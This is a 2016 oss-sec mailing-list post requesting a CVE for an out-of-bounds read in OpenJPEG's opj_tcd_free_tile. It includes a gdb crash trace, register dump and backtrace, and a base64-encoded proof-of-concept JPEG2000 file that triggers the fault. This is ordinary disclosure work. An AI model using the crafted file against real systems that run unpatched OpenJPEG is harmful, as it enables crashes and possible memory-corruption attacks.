oss-sec mailing list archives

CVE request - OpenJPEG : Out-Of-Bounds Read in opj_tcd_free_tile function

From: winsonliu(刘科) <winsonliu () tencent com>
Date: Mon, 14 Mar 2016 06:51:56 +0000
Hi all,

I find a vulnerability of OpenJPEG. The specific flaw exists within the opj_tcd_free_tile function. A specially crafted 
JPEG2000 image file can force Out-Of-Bounds Read occurring in OpenJPEG. This issue can be reproduced in the latest 
version of OpenJPEG (https://github.com/uclouvain/openjpeg 2016.03.14).

The detailed information about this issue can be described as follows.
---------------------------------
winson@ubuntu:~/Desktop/repo/openjpeg/bin$ gdb opj_decompress -q
Reading symbols from opj_decompress...(no debugging symbols found)...done.

(gdb) r -o image.pgm -i opj_tcd_free_tile.jp2 
Starting program: /home/winson/Desktop/repo/openjpeg/bin/opj_decompress -o image.pgm -i oob_opj_tcd_free_tile.jp2

[INFO] Start to read j2k main header (131).
[INFO] Main header has been correctly decoded.
[INFO] No decoded area parameters, set the decoded area to the whole image
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No incltree created.
[WARNING] tgt_create tree->numnodes == 0, no tree created.
[WARNING] No imsbtree created.
[INFO] Header of tile 1 / 1 has been read.
[INFO] Tile 1/1 has been decoded.
[INFO] Image data has been updated with tile 1.

[INFO] Stream reached its end !
/home/winson/Desktop/repo/openjpeg/src/bin/jp2/convert.c:1765:imagetopnm
precision 31 is larger than 16
: refused.
[ERROR] Outfile image.pgm not generated

Program received signal SIGSEGV, Segmentation fault.
0xb7fc61ae in opj_tcd_free_tile () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7

(gdb) bt
#0  0xb7fc61ae in opj_tcd_free_tile () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#1  0xb7fc3ffa in opj_tcd_destroy () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#2  0xb7fa6cea in opj_j2k_destroy () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#3  0xb7fb4b38 in opj_jp2_destroy () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#4  0xb7fb74ac in opj_destroy_codec () from /home/winson/Desktop/repo/openjpeg/bin/libopenjp2.so.7
#5  0x0804ca82 in main ()

(gdb) x /i $eip
=> 0xb7fc61ae <opj_tcd_free_tile+288>: mov    0x20(%eax),%eax
(gdb) i r
eax            0x40f72d11 1089940753
ecx            0x30 48
edx            0x362e88c5 909019333
ebx            0xb7fd6000 -1208131584
esp            0xbfff9e80 0xbfff9e80
ebp            0xbfff9ec8 0xbfff9ec8
esi            0x0 0
edi            0x0 0
eip            0xb7fc61ae 0xb7fc61ae <opj_tcd_free_tile+288>
eflags         0x10293 [ CF AF SF IF RF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51

(gdb) x /40xb $eax
0x40f72d11: Cannot access memory at address 0x40f72d11

(gdb) x /40xb $eax-0x20
0x40f72cf1: Cannot access memory at address 0x40f72cf1


The attachment is the proof-of-concept file.
Alternatively, you can decode the following string using base64 and save the decoded content to a .jp2 file.
---------------------------------
AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAABbanAyaAAAABZpaGRyAAAAIAAAACAA
BP8HAAAAAAAMYnBjYwQEBAAAAAAPY29scgEAAAAAABgAAAAiY2RlZgAEAAAAAAACAAEAAAADAAIA
AAADAAMAAQAAAAABI2pwMmP/T/9RADIAAAAAACAAAAAgAAAAAAAAAAAAAAAgAAAAIAAAAAAAAAAA
AAQECxWeAQEEAQEAAQH/UgAMAAAAAQEFBAQAAf9cABNAKDAwODAwODAwODAwODAwOP9kACUAAUNy
ZWF0ZWQgYnkgT3BlbkpQRUcgdmVyc2lvbiAyLjEuMP+QAAoAAAAAAJkAAf+TwQgDz4AQCcOBA4Ch
8AIEp8YIBr+vpBAJ18hAA6PjCAOXpU+vpCALHlIPoeDACzrXgKPkCgDP1Tx/p84cA3/dRtwif6fO
HAN/3VDyfH+AofCKPmKiqS6j5BI9pjRZ2Z4Nooaj4xA9pjRZ2Z4Nv4Cg6MCdlqj4G1+h8I6drClA
9VfWofCMnawpQPlngP/Z


CREDIT:
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.
Attachment: oob_opj_tcd_free_tile.jp2
Description: oob_opj_tcd_free_tile.jp2
Current thread:

CVE request - OpenJPEG : Out-Of-Bounds Read in opj_tcd_free_tile function 刘科 (Mar 14)
- Re: CVE request - OpenJPEG : Out-Of-Bounds Read in opj_tcd_free_tile function cve-assign (Mar 16)